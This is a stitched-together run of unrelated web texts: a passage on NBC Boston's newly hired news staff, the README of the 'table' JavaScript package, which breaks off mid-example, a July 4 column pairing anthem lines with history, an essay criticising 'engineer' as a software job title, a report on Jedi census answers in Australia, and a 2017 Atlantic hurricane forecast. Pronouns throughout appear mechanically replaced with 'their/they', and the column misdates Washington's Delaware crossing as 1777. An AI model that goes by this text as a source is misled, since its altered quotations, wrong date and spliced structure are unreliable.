The FCC wants to buy local TV signals from smaller stations willing to go dark and will auction their broadcast capability off to the highest bidders — an opportunity for NBC to pick up more signal strength . NBC also reportedly is eyeing purchasing Channel 68 in Boston , which would give it the same broadcast reach as WHDH .
NBC has already hired a raft of talent to man its ? local news operation when it goes on the air , and will share resources with NECN , which , like the network , is owned by Comcast . Until the new station begins broadcasting , the talent has been working at NECN .
The new pickups include :
• ? Former Channel 7 weatherman Pete Bouchard .
• ? Investigative reporter Karen Hensel , who worked for WISH in Indianapolis for 14 years .
• ? Former Fox 25 anchor/reporter Shannon Mulaire , who anchored “ Early ? Today ” on NBC and “ First Look ” on MSNBC .
• ? Melody Mendez , who began their career at Boston Neighborhood Network News and most recently anchored WFLD 's “ Good Day Chicago . ”
• ? Former Fox 25 anchor/reporter Joy Lim Nakrin .
And rumor has it , the NBC Boston suits also are eyeing Phil Lipof , whose contract with WCVB runs out at the end of the year .
They 've not determined yet who is going to anchor what newscast , ” said the insider . “ Usually , stations have something specific in mind . It 's a work in progress I guess , but they have a lot of work to do to get going . ”
As always , do stay tuned …
Table
Produces a string that represents array data in a text table .
Features
Works with strings containing fullwidth characters .
Works with strings containing ANSI escape codes .
Configurable border characters .
Configurable content alignment per column .
Configurable content padding per column .
Configurable column width .
Text wrapping .
Usage
Table data is described using an array ( rows ) of array ( cells ) .
import { table } from ' table ' ; let data , output ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; output = table ( data ) ; console . log ( output ) ;
╔════╤════╤════╗ ║ 0A │ 0B │ 0C ║ ╟────┼────┼────╢ ║ 1A │ 1B │ 1C ║ ╟────┼────┼────╢ ║ 2A │ 2B │ 2C ║ ╚════╧════╧════╝
Cell Content Alignment
{ string } config.columns [ { number } ] .alignment property controls content horizontal alignment within a cell .
Valid values are : `` left '' , `` right '' and `` center '' .
let config , data , output ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; config = { columns : { 0 : { alignment : ' left ' , minWidth : 10 } , 1 : { alignment : ' center ' , minWidth : 10 } , 2 : { alignment : ' right ' , minWidth : 10 } } } ; output = table ( data , config ) ; console . log ( output ) ;
╔════════════╤════════════╤════════════╗ ║ 0A │ 0B │ 0C ║ ╟────────────┼────────────┼────────────╢ ║ 1A │ 1B │ 1C ║ ╟────────────┼────────────┼────────────╢ ║ 2A │ 2B │ 2C ║ ╚════════════╧════════════╧════════════╝
Column Width
{ number } config.columns [ { number } ] .width property restricts column width to a fixed width .
let data , output , options ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; options = { columns : { 1 : { width : 10 } } } ; output = table ( data , options ) ; console . log ( output ) ;
╔════╤════════════╤════╗ ║ 0A │ 0B │ 0C ║ ╟────┼────────────┼────╢ ║ 1A │ 1B │ 1C ║ ╟────┼────────────┼────╢ ║ 2A │ 2B │ 2C ║ ╚════╧════════════╧════╝
Custom Border
{ object } config.border property describes characters used to draw the table border .
let config , data , output ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; config = { border : { topBody : ` ─ ` , topJoin : ` ┬ ` , topLeft : ` ┌ ` , topRight : ` ┐ ` , bottomBody : ` ─ ` , bottomJoin : ` ┴ ` , bottomLeft : ` └ ` , bottomRight : ` ┘ ` , bodyLeft : ` │ ` , bodyRight : ` │ ` , bodyJoin : ` │ ` , joinBody : ` ─ ` , joinLeft : ` ├ ` , joinRight : ` ┤ ` , joinJoin : ` ┼ ` } } ; output = table ( data , config ) ; console . log ( output ) ;
┌────┬────┬────┐ │ 0A │ 0B │ 0C │ ├────┼────┼────┤ │ 1A │ 1B │ 1C │ ├────┼────┼────┤ │ 2A │ 2B │ 2C │ └────┴────┴────┘
Draw Horizontal Line
{ function } config.drawHorizontalLine property is a function that is called for every non-content row in the table . The result of the function { boolean } determines whether a row is drawn .
let data , output , options ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] , [ ' 3A ' , ' 3B ' , ' 3C ' ] , [ ' 4A ' , ' 4B ' , ' 4C ' ] ] ; options = { drawHorizontalLine : ( index , size ) = > { return index === 0 || index === 1 || index === size - 1 || index === size ; } } ; output = table ( data , options ) ; console . log ( output ) ;
╔════╤════╤════╗ ║ 0A │ 0B │ 0C ║ ╟────┼────┼────╢ ║ 1A │ 1B │ 1C ║ ║ 2A │ 2B │ 2C ║ ║ 3A │ 3B │ 3C ║ ╟────┼────┼────╢ ║ 4A │ 4B │ 4C ║ ╚════╧════╧════╝
Padding Cell Content
{ number } config.columns [ { number } ] .paddingLeft and { number } config.columns [ { number } ] .paddingRight properties control content padding within a cell . Property value represents a number of whitespaces used to pad the content .
let config , data , output ; data = [ [ ' 0A ' , ' AABBCC ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; config = { columns : { 0 : { paddingLeft : 3 } , 1 : { width : 2 , paddingRight : 3 } } } ; output = table ( data , config ) ; console . log ( output ) ;
╔══════╤══════╤════╗ ║ 0A │ AA │ 0C ║ ║ │ BB │ ║ ║ │ CC │ ║ ╟──────┼──────┼────╢ ║ 1A │ 1B │ 1C ║ ╟──────┼──────┼────╢ ║ 2A │ 2B │ 2C ║ ╚══════╧══════╧════╝
Predefined Border Templates
You can load one of the predefined border templates using getBorderCharacters function .
import { table , getBorderCharacters } from ' table ' ; let config , data ; data = [ [ ' 0A ' , ' 0B ' , ' 0C ' ] , [ ' 1A ' , ' 1B ' , ' 1C ' ] , [ ' 2A ' , ' 2B ' , ' 2C ' ] ] ; config = { border : getBorderCharacters ( ` name of the template ` ) } ; table ( data , config ) ;
# honeywell ╔════╤════╤════╗ ║ 0A │ 0B │ 0C ║ ╟────┼────┼────╢ ║ 1A │ 1B │ 1C ║ ╟────┼────┼────╢ ║ 2A │ 2B │ 2C ║ ╚════╧════╧════╝ # norc ┌────┬────┬────┐ │ 0A │ 0B │ 0C │ ├────┼────┼────┤ │ 1A │ 1B │ 1C │ ├────┼────┼────┤ │ 2A │ 2B │ 2C │ └────┴────┴────┘ # ramac ( ASCII ; for use in terminals that do not support Unicode characters ) + -- -- + -- -- + -- -- + | 0A | 0B | 0C | | -- -- | -- -- | -- -- | | 1A | 1B | 1C | | -- -- | -- -- | -- -- | | 2A | 2B | 2C | + -- -- + -- -- + -- -- + # void ( no borders ; see `` bordless table '' section of the documentation ) 0A 0B 0C 1A 1B 1C 2A 2B 2C
Raise an issue if you 'd like to contribute a new border template .
Borderless Table
Simply using `` void '' border character template creates a table with a lot of unnecessary spacing .
To create a more plesant to the eye table , reset the padding and remove the joining rows , e.g .
let output ; output = table ( data , { border : getBorderCharacters ( ` void ` ) , columnDefault : { paddingLeft : 0 , paddingRight : 1 } , drawHorizontalLine : ( ) = > { return false } } ) ; console . log ( output ) ;
0A 0B 0C 1A 1B 1C 2A 2B 2C
Streaming
table package exports createStream function used to draw a table and append rows .
createStream requires { number } columnDefault.width and { number } columnCount configuration properties .
import { createStream } from ' table ' ; let config , stream ; config = { columnDefault : { width : 50 } , columnCount : 1 } ; stream = createStream ( config ) ; setInterval ( ( ) = > { stream . write ( [ new Date ( ) ] ) ; } , 500 ) ;
table package uses ANSI escape codes to overwrite the output of the last line when a new row is printed .
The underlying implementation is explained in this Stack Overflow answer .
Streaming supports all of the configuration properties and functionality of a static table ( such as auto text wrapping , alignment and padding ) , e.g .
import { createStream } from ' table ' ; import _ from ' lodash ' ; let config , stream , i ; config = { columnDefault : { width : 50 } , columnCount : 3 , columns : { 0 : { width : 10 , alignment : ' right ' } , 1 : { alignment : ' center ' , } , 2 : { width : 10 } } } ; stream = createStream ( config ) ; i = 0 ; setInterval ( ( ) = > { let random ; random = _ . sample ( ' abcdefghijklmnopqrstuvwxyz ' , _ . random ( 1 , 30 ) ) . join ( ' ' ) ; stream . write ( [ i ++ , new Date ( ) , random ] ) ; } , 500 ) ;
Text Truncation
To handle a content that overflows the container width , table package implements text wrapping . However , sometimes you may want to truncate content that is too long to be displayed in the table .
{ number } config.columns [ { number } ] .truncate property ( default : Infinity ) truncates the text at the specified length .
let config , data , output ; data = [ [ ' Lorem ipsum dolor sit amet , consectetur adipiscing elit . Phasellus pulvinar nibh sed mauris convallis dapibus . Nunc venenatis tempus nulla sit amet viverra . ' ] ] ; config = { columns : { 0 : { width : 20 , truncate : 100 } } } ; output = table ( data , config ) ; console . log ( output ) ;
╔══════════════════════╗ ║ Lorem ipsum dolor si ║ ║ t amet , consectetur ║ ║ adipiscing elit . Pha ║ ║ sellus pulvinar nibh ║ ║ sed mauris conva ... ║ ╚══════════════════════╝
Text Wrapping
table package implements auto text wrapping , i.e . text that has width greater than the container width will be separated into multiple lines , e.g .
let config , data , output ; data = [ [ ' Lorem ipsum dolor sit amet , consectetur adipiscing elit . Phasellus pulvinar nibh sed mauris convallis dapibus . Nunc venenatis tempus nulla sit amet viverra . ' ] ] ; config = { columns : { 0 : { width : 20 } } } ; output = table ( data , config ) ; console . log ( output ) ;
╔══════════════════════╗ ║ Lorem ipsum dolor si ║ ║ t amet , consectetur ║ ║ adipiscing elit . Pha ║ ║ sellus pulvinar nibh ║ ║ sed mauris convallis ║ ║ dapibus . Nunc venena ║ ║ tis tempus nulla sit ║ ║ amet viverra . ║ ╚══════════════════════╝
When wrapWord is true the text is broken at the nearest space or one of the special characters ( `` - '' , `` _ '' , `` '' , `` / '' , `` . `` , `` , '' , `` ; '' ) , e.g .
let config , data , output ; data = [ [ ' Lorem ipsum dolor sit amet , consectetur adipiscing elit . Phasellus pulvinar nibh sed mauris convallis dapibus . Nunc venenatis tempus nulla sit amet viverra . ' ] ] ; config = { columns : { 0 : { width : 20 , wrapWord : true } } } ; output = table ( data , config ) ; console . log ( output ) ;
This column was originally published July 4 , 2002 .
O say , can you see ,
John Adams sat alone the night of July 2 , 1776 , writing to their wife , Abigail . `` The second day of July 1776 will be the most memorable epocha in the history of America . '' Over the next two days , Congress would debate , edit and finally sign the Declaration of Independence . The world would never be the same .
By the dawn 's early light ,
George Washington peered from their small boat on a frigid Christmas night , 1777 . They looked back at their weary , bone-cold soldiers , then across the icy Delaware River . Soon , they would attempt a daring surprise operation against Trenton . It would be a turning point in the War for Independence .
What so proudly we hailed
James Madison , relieved , affixed their name to the Constitution of the United States . The date was Sept. 17 , 1787 , and the document Madison signed would be the basis for a democratic republic , `` a more perfect union . ''
At the twilight 's last gleaming ?
Praying `` that heaven may continue to you the choicest tokens of its beneficence , '' George Washington stepped down as president of the United States with their Farewell Address in 1796 , peacefully passing the mantle of leadership to John Adams .
Whose broad stripes and bright stars ,
Francis Scott Key stood aboard a ship 8 miles downriver from Fort McHenry Sept. 13 , 1814 . They watched anxiously as British warships pounded the fort . As dawn broke , the 40-foot flag over the fort billowed majestically in the wind . Key excitedly spotted the flag , pulled out an envelope and began to write .
Through the perilous fight ,
Robert E. Lee stood behind their line , overlooking Gettysburg . Sprawled across the field were countless bodies , Americans all , enemies in life , brothers in death . As the sun set on July 2 , 1863 , President Lincoln retired for the evening . The casualty statistics would not reach them for hours , but the magnitude of death was stunning . The outcome of the Civil War was very much in doubt .
O'er the ramparts we watched ,
As freed slaves peeked over the barrier of slavery , Congress adopted the Fifteenth Amendment on March 30 , 1870 , guaranteeing that `` the right of citizens of the United States to vote shall not be denied or abridged by the United States or by any state on account of race , color , or previous condition of servitude . ''
Were so gallantly streaming ?
Ten-year-old Harry Shapiro stood on deck , their eyes fixed on the Statue of Liberty . Having fled the pogroms of Russia , Shapiro later said that seeing the Statue was the greatest thrill of their life . The year was 1905 , and two years later a record 1,285,349 immigrants flooded into the United States of America .
And the rockets ' red glare ,
`` Above their wreath-strewn graves we kneel/They kept the faith and fought the fight./Through flying lead and crimson steel/They plunged for Freedom and the Right , '' penned Joyce Kilmer . At the age of 33 , Kilmer volunteered for service in World War I . They were killed in France on July 30 , 1918 .
The bombs bursting in air ,
On Aug. 6 , 1945 , an atomic bomb was dropped on Hiroshima . President Harry Truman stated : `` Let there be no mistake ; we shall completely destroy Japan 's power to make war . '' By dropping the bomb , Truman effectively ended World War II and saved hundreds of thousands of American lives .
Gave proof through the night
Sgt . William Port and their platoon moved swiftly through the undergrowth of Vietnam Jan. 12 , 1968 . Suddenly , a burst of heavy gunfire began , forcing the platoon back . Despite being wounded by the gunfire , Port dragged a downed friend to the platoon perimeter . When an enemy grenade was thrown into their bunker , Port leapt on it . Left for dead , taken as a POW , they died of starvation and their wounds .
That our flag was still there
As the smoke , dust and flame rose from mid-Manhattan , three firefighters stood atop the rubble of the World Trade Center , amid the gravesites of thousands , and raised an American flag . Two hundred miles south , rescue workers lowered a flag over the side of the Pentagon . It was Sept. 11 , 2001 .
O say , does that star-spangled banner yet wave
`` The course of this conflict is not known , yet its outcome is certain . Freedom and fear , justice and cruelty , have always been at war , and we know that God is not neutral between them . '' -- President George W. Bush , Sept. 20 , 2001
O'er the land of the free and the home of the brave ?
Please consider disabling it for our site , or supporting our work in one of these ways
I 'm commiserating with a friend who recently left the technology industry to return to entertainment . “ I 'm not a programmer , ” they begin , explaining some of the frustrations of their former workplace , before correcting himself , “ —oh , engineer , in tech-bro speak . Though to me , engineers are people who build bridges and follow pretty rigid processes for a reason. ” Their indictment touches a nerve . In the Silicon Valley technology scene , it 's common to use the bare term “ engineer ” to describe technical workers . Somehow , everybody who is n't in sales , marketing , or design became an engineer . “ We 're hiring engineers , ” read startup websites , which could mean anything from Javascript programmers to roboticists . The term is probably a shortening of “ software engineer , ” but its use betrays a secret : “ Engineer ” is an aspirational title in software development . Traditional engineers are regulated , certified , and subject to apprenticeship and continuing education . Engineering claims an explicit responsibility to public safety and reliability , even if it does n't always deliver .
When it comes to skyscrapers and bridges and power plants and elevators and the like , engineering has been , and will continue to be , managed partly by professional standards , and partly by regulation around the expertise and duties of engineers . But fifty years ' worth of attempts to turn software development into a legitimate engineering practice have failed . Just as the heavy industry can greenwash to produce the appearance of environmental responsibility and the consumer industry can pinkwash to connect themselves to cause marketing , so the technology industry can “ engineerwash ” —leveraging the legacy of engineering in order to make their products and services appear to engender trust , competence , and service in the public interest . * * * By the 1960s , large national-defense systems were largely managed by computers . But the creation of such systems was a disaster—almost everything was delivered late , over budget , and with unnecessary complexity . Late in the decade , the NATO Science Committee sponsored two conferences dedicated to establishing an engineering approach to software creation . The 1968 conference report shows that the notion was still aspirational : The phrase “ software engineering ” was deliberately chosen as being provocative , in implying the need for software manufacture to be based on the types of theoretical foundations and practical disciplines , that are traditional in the established branches of engineering . Commercial applications meant to service ordinary people , from inventory control to airline reservations to banking , needed to be reliable . Programming merely involved implementation .
Software-engineering trends came and went during the ensuing decades . Structured programming paradigms of the 1960s , meant to make software development more predictable and less risky , gave way to the object-oriented paradigm of the ‘ 80s and ‘ 90s , meant to make programming better mirror the business processes it facilitates . Meanwhile , the overall challenges of software engineering became more familiar and more entrenched . A decade after their 1975 intervention The Mythical Man-Month : Essays on Software Engineering , Fred Brooks lamented that little had changed . In response , they proposed incremental development , or prototyping . Today 's software development is iterative , and for good reason : Software was n't ever really akin to manufacturing and construction , where changes were difficult or impossible after initial implementation . Computing is turning engineering into a type of speculative finance rather than a calling . But , software was never not akin to manufacturing and construction , either . Almost 50 years after the NATO Science Committee conferences , some of its participants ' warnings still hold . “ In the competitive rush to make available the latest techniques , ” the ‘ 68 report opines , “ we strive to take great forward leaps across gulfs of unknown width and depth. ” The same sentiment still holds today . So , what happened ? The personal-computer revolution , for one . In the 1960s and ‘ 70s , computers were expensive and scarce . They were confined to research , in governmental , corporate , and industrial contexts . But with the rise of the microcomputer in the late 1970s , anyone could own , use , and program one .
This democratization of software development ignited the consumer and business-software revolution . But it also changed the stakes of software engineering . Developing Microsoft Excel or the back-office systems at American Airlines was hardly glamorous or fast-paced . A giant product like a spreadsheet or a reservation system was still something like a bridge or a building : It had to work right , especially since patches and revisions were expensive and required physical intervention . Such cases require an engineering approach , while trying one 's hand at a program for upload to the local BBS ( or the modern app store ) does not . The informality of software development accelerated even more with the rise of the web , starting in the mid ‘ 90s and continuing through today . As software services moved to websites , smartphones , and the Cloud , two things happened . First , the pressure to get things right the first time around was relieved , because updates and changes could be applied centrally , as in the mainframe era . Over time , the ease of rapid repair became an excuse for rapid development , and Brooks-style prototyping mutated into the constant software updates we experience today . Facebook has wisely retired its one-time internal-development philosophy , “ move fast and break things , ” but no business reliant on civil or structural engineering would ever have adopted such a motto in the first place .
And second , software became more isolated from the world , even as it became more predominant . Earlier computing systems were imbricated with other aspects of business , industry , government , and society . An automobile customer-management system has to integrate with dealers , suppliers , shippers , banks and lenders , regulators , legacy systems , and customers . But today 's software mostly stands alone . Instagram , a photo-sharing service valued at $ 35 billion last year , just uploads and downloads images between its servers and its app . To be sure , today 's Cloud-connected tools still rely on infrastructures , especially the physical servers and networks that handle millions of users accessing billions of files . But those activities have largely been outsourced to infrastructure giants . Likewise , integrations with messaging , financials , and storage have been abstracted such that individual software developers can treat them as black boxes . That sometimes allows software to run better and more reliably , but it also allows developers to avoid interfacing with the messy world outside their co-working spaces . As a result , software development has become institutionally hermetic . And that 's the opposite of what “ engineering ” ought to mean : a collaboration with the world , rather than a separate domain bent on overtaking it . * * * The traditional disciplines of engineering—civil , mechanical , aerospace , chemical , electrical , environmental—are civic professions as much as technical ones . Engineers orchestrate the erection of bridges and buildings ; they design vehicles and heavy machinery ; they invent and realize the energy systems that drive this equipment ; and they contrive methods for connecting all of these systems together .
It 's no accident that the most truly engineered of software-engineering projects extend well beyond the computer . Autonomous-vehicle design offers the most obvious contemporary example . When Google designs self-driving cars , it musters its own computational systems , like mapping and navigation . But it also integrates those into a world much larger than browsers and smartphones and data centers . Autonomous vehicles share the roads with human-driven cars , pedestrians , and bicyclists . Those roads are managed , maintained , and regulated . Self-driving cars also interface with federal motor-vehicle standards and regulations , along with all the other material demands and foibles of a machine made of metal and plastic and rubber rather than bits . Engineering addresses complex , large-scale systems . This is why it is so infuriating when Uber insists that it is just a technology platform , and thus not subject to the oversight of transportation-services regulation . Love or hate it , Uber is not just an app developer—it 's a car-service network activated by software , and thus subject to public interest and oversight . And no matter what Uber says , the company still advertises careers in “ engineering , design , and product ” categories on its website . Engineering roles are illustrated by a bearded guy staring at source code on two monitors .  Uber Screenshot Other engineering disciplines are subject to certification and licensure . If you 've ever hired a civil , structural , or hydraulic engineer for a construction or repair project , that individual probably had to be certified as a Professional Engineer ( PE ) . Licensing processes vary by state , but Professional Engineers generally need to hold a 4-year degree from an accredited program in their discipline , pass one or more exams , and possess 4 or more years of professional experience under the supervision of a licensed engineer . Not all working engineers are or need to be Professional Engineers , but to open an engineering consulting practice or to claim that one is an “ engineer ” in a formal context , licensure is usually required . It 's in the state 's interest to ensure that someone claim to be an engineer ( or an architect a surveyor or a cosmetologist or a massage therapist ) is n't just making up their or their qualifications .
Professional Engineering certification is usually offered only in fields where something could go terribly , horribly wrong with unqualified actors at the helm . California , for example , issues Professional licenses for agricultural , chemical , civil , control system , electrical , fire protection , industrial , mechanical , metallurgical , nuclear , petroleum engineering , and traffic engineers . In 2013 , the National Council of Examiners of Engineers and Surveyors ( NCEES ) , which all 50 states use for licensure examination , began offering testing for software engineers . The exams were produced in collaboration with the IEEE , who maintains a Software Engineering Body of Knowledge ( SWEBOK ) . But it 's unlikely that Silicon Valley workers would pursue such a license . For one , software engineers are unlikely to open a private office like a structural engineer might do . Even if all engineers are supposed to work under a licensed engineer to use the name , at big companies , many do so under layers of management . The information-technology industry simply does n't value certification as much as engineering does , or even as much as IT once did . Silicon Valley bigwigs like Peter Thiel have been flouting formal degrees for years , and even big companies like Google have indicated that they do n't value a college degree over and above the ability to do whatever work Google decides is important . But by definition , “ engineering ” has traditionally entailed the completion of an Accreditation Board for Engineering and Technology ( ABET ) -approved 4-year degree . ABET 's accreditation requirements for computer science are vague , but they do expect “ an ability to apply design and development principles in the construction of software systems of varying complexity . ”
Accredited computer-science programs might be moving further away from software engineering anyway . Agile software development has become predominant , focused on rapid iteration rather than long-term planning and intricate documentation . One popular agile method is Scrum , which is focused on short “ sprints ” toward a series of changing goals . Engineers bear a burden to the public , and their specific expertise emanates from that responsibility . Lightweight approaches like Scrum are more compatible with the fast-moving marketplace of computer technology . An app or a web service is n't a bridge or a building . Software is temporary , and provisionalism is considered a feature , not a bug . But at the same time , the stakes of software development are becoming akin to that of bridges and buildings . Not only do computers run our cars and airplanes and medical devices , but also our banking systems , health-care organizations , insurance-underwriting practices , telephony and communication networks—even our social and entertainment activities . And even if successful , methodologies like Scrum never allow that infrastructure to stabilize . Some new tweak can be made , some new feature can always be added . Meanwhile , start-up culture is changing engineering education anyway . Entrepreneurship is exalted . Accelerators and incubators abound . Not all students in computer-science programs think they 'll become startup billionaires… But not all of them do n't think so , either . Would-be “ engineers ” are encouraged to think of every project as a potential business ready to scale and sell , rather than as a process of long-term training in disciplines where concerns for social welfare become paramount . Engineering has always been a well-paid profession , but computing is turning it into a type of speculative finance rather than a calling .
* * * The U.S. Bureau of Labor and Statistics ( BLS ) calls the “ engineers ” who work at Google and Uber and Facebook and its ilk “ Computer Programmers ” or “ Software Developers. ” The former write code , the latter design systems . Nobody has to follow the BLS 's definitions , and you can understand why more grandiose titles would appeal to Silicon Valley disruptors . “ Engineer ” conjures the image of the hard-hat-topped designer-builder , carefully crafting tomorrow . But such an aspiration is rarely realized by computing . The respectability of engineering , a feature built over many decades of closely controlled , education- and apprenticeship-oriented certification , becomes reinterpreted as a fast-and-loose commitment to craftwork as business . Engineerwashing entails a shift from to the verbal sense of “ engineer. ” An engineer is a professional who designs , builds , and maintains systems . But to engineer means skillfully , artfully , or even deviously contriving an outcome . To engineer is to jury-rig , to get something working more or less , for a time . Sufficiently enough that it serves an immediately obvious purpose , but without concern or perhaps even awareness of its longevity . Engineering in this sense embodies MacGyver scrappiness , a doggedness compatible with today 's values of innovative disruption . But then , no reasonable person would want MacGyver building their bridges or buildings . Or software !
Atheists down under say fans should take the census more seriously .
It 's census time in Australia and on Tuesday around 65,000 Australians are expected to mark Jedi as their religion on their official forms .
That was the figure who identified with the George Lucas-created mythic ‘ order ‘ of Star Wars heroes in the 2011 census , then marking around 0.37 percent of Australia 's population and officially placing the number of Jedi in the country just behind Sikhs and above Seventh Day Adventists .
It 's a number that been growing steadily since the 2001 census ( a national head count is held every five years down under ) , but now Australia 's atheists are asking for the joke to stop .
The Atheist Foundation of Australia has been rolling out its # censusnoreligion campaign , part of which uses Star Wars imagery .
“ If old religious men in robes do n't represent you , do n't mark yourself as Jedi . Jedi and other joke religions are not placed in the 'no religion ' category but in 'not defined , ” it says .
Kylie Sturgess , president of the Atheist Foundation of Australia , who marked Jedi as their religion for fun in the last census , told Fairfax Media this skews the census results by making Australia appear more religious than it is .
`` Answering the religion question thoughtfully and honestly matters because it benefits all Australians when decisions on how to spend taxpayer dollars are made on sound data that accurately reflects modern-day Australia , ” they said .
Australia is not the only English-speaking market in which citizens identify their religion as Jedi . In the U.K. in 2001 , 390,127 citizens , or 0.7 percent of the population , took up the Jedi cause , a number which had halved by 2011 , according to the BBC .
Jokes aside , Aussies can be fined up to AUS $ 180 ( $ 137 ) for not filing a census form or filling it in incorrectly .
00:53 WWII Guns Revealed Thanks to Hurricane Matthew Beach erosion reveals astounding sight from World War II .
At a Glance Colorado State University expects 14 named storms , six hurricanes and two major hurricanes this season .
NOAA expects 11 to 17 named storms this season , more than the 30-year average for the Atlantic Basin .
The Weather Company predicts 14 named storms , seven hurricanes and three major hurricanes this season .
Warmer North Atlantic sea surface temperatures and the reduced likelihood of El Niño 's development are among the factors taken into account . The 2017 Atlantic hurricane season is forecast to be more active than historical averages with regard to the number of named storms , according to the latest forecasts released by Colorado State University , the National Oceanic Atmospheric Administration and The Weather Company , an IBM Business .
( MORE : Hurricane Central )
The Colorado State University ( CSU ) Tropical Meteorology Project outlook headed by Dr. Phil Klotzbach updated its forecast Thursday , calling for an above-average number of named storms with 14 expected . CSU forecasts an average number of hurricanes this year , with six expected in the Atlantic Basin . A below-average number of major hurricanes – two – is also anticipated .
The 30-year historical average ( 1981-2010 ) for the Atlantic Basin is 12 named storms , six hurricanes and three major hurricanes . A major hurricane is of Category 3 strength or higher on the Saffir-Simpson Hurricane Wind Scale .
NOAA issued its forecast at the end of May and called for :
Eleven to 17 named storms – including April 's Tropical Storm Arlene .
Five to nine of which would become hurricanes .
Two to four of which would become major hurricanes .
An important note is that Tropical Storm Arlene , which formed in April , is included in the seasonal forecast numbers in the outlooks .
< img class= '' styles__noscript__2rw2y '' src= '' https : //dsx.weather.com//util/image/w/trop_fcst_csu_noaa_twc_0601.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 '' srcset= '' https : //dsx.weather.com//util/image/w/trop_fcst_csu_noaa_twc_0601.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 400w , https : //dsx.weather.com//util/image/w/trop_fcst_csu_noaa_twc_0601.jpg ? v=ap & w=980 & h=551 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 800w '' > Numbers of Atlantic Basin named storms , those that attain at least tropical storm strength , hurricanes , and hurricanes of Cat . 3 intensity forecasts by The Weather Company , an IBM business , NOAA , and Colorado State University compared to 30-year average .
According to NOAA , `` The outlook reflects our expectation of a weak or non-existent El Niño , near- or above-average sea-surface temperatures across the tropical Atlantic Ocean and Caribbean Sea and average or weaker-than-average vertical wind shear in that same region . ''
Strong El Niños typically lead to increased wind shear in parts of the Atlantic Basin , suppressing the development or intensification of tropical cyclones in the Atlantic , so the prediction for weak conditions increased the chance for more activity this season .
`` The climate models are showing considerable uncertainty , which is reflected in the comparable probabilities for an above-normal and near-normal season , '' NOAA added .
( MORE : 5 Changes Coming to Hurricane Season Forecasts )
The Weather Company updated its seasonal forecast earlier in May and expects a total of 14 named storms – seven hurricanes and three major hurricanes – this season . This is an increase from its forecast compared to April due to a couple of factors .
One of the reasons is that warmer sea-surface temperatures have been observed in the North Atlantic , which have correlated with more active seasons in the past . In addition , there are indications that further warming is likely .
Another factor the outlook cited is that there is a reduced potential for the development and strength of El Niño later this summer .
Given the current trends , there is the potential for another increase with the next update in June . `` The historically strong North Atlantic blocking event in early May also suggests the possibility of continued increases in North Atlantic sea-surface temperature anomalies , so it would be no surprise if we increased our forecast numbers again , '' said Dr. Todd Crawford , chief meteorologist with The Weather Company .
( MORE : The Latest on El Niño 's Possible Development )
< img class= '' styles__noscript__2rw2y '' src= '' https : //dsx.weather.com//util/image/w/2017-atlantic-hurricane-season-names.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 '' srcset= '' https : //dsx.weather.com//util/image/w/2017-atlantic-hurricane-season-names.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 400w , https : //dsx.weather.com//util/image/w/2017-atlantic-hurricane-season-names.jpg ? v=ap & w=980 & h=551 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 800w '' > 2017 Atlantic hurricane season names .
However , Dr. Phil Klotzbach noted , `` While the tropical Atlantic is warmer than normal , the far North Atlantic remains colder than normal , potentially indicative of a negative phase of the Atlantic Multi-Decadal Oscillation ( AMO ) . Negative phases of the AMO tend to be associated with overall less conducive conditions for the Atlantic hurricane activity due to higher tropical Atlantic surface pressures , drier middle levels of the atmosphere and increased levels of sinking motion . ''
The official Atlantic hurricane season begins June 1 and runs through Nov. 30 . Occasionally , storms can form outside those months as happened this year with Tropical Storm Arlene . This also occurred last season with January 's Hurricane Alex and late May 's Tropical Storm Bonnie .
( MORE : 10 Things We Remembered Most About the 2016 Season )
What Does This Mean For the U.S. ?
There is no strong correlation between the number of storms or hurricanes and U.S. landfalls in any given season . One or more of the 11 to 14 named storms forecast to develop this season could hit the U.S. , or none at all . Therefore , residents of the coastal United States should prepare each year no matter the forecast .
A couple of classic examples of why you need to be prepared each year occurred in 1992 and 1983 .
The 1992 season produced only six named storms and one subtropical storm . However , one of those named storms was Hurricane Andrew , which devastated South Florida as a Category 5 hurricane .
In 1983 there were only four named storms , but one of them was Alicia . The Category 3 hurricane hit the Houston-Galveston area and caused almost as many direct fatalities there as Andrew did in South Florida .
In contrast , the 2010 season was active . There were 19 named storms and 12 hurricanes that formed in the Atlantic Basin .
Despite the large number of storms that year , not a single hurricane and only one tropical storm made landfall in the United States .
In other words , a season can deliver many storms , but have little impact , or deliver few storms and have one or more hitting the U.S. coast with major impact .
< img class= '' styles__noscript__2rw2y '' src= '' https : //dsx.weather.com//util/image/w/2016_hurricane_season_se_coast.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 '' srcset= '' https : //dsx.weather.com//util/image/w/2016_hurricane_season_se_coast.jpg ? v=at & w=485 & h=273 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 400w , https : //dsx.weather.com//util/image/w/2016_hurricane_season_se_coast.jpg ? v=ap & w=980 & h=551 & api=7db9fe61-7414-47b5-9871-e17d87b8b6a0 800w '' > The named storms that affected the U.S. in 2016 were clustered in the Southeast .
The U.S. averages one to two hurricane landfalls each season , according to NOAA 's Hurricane Research Division statistics .
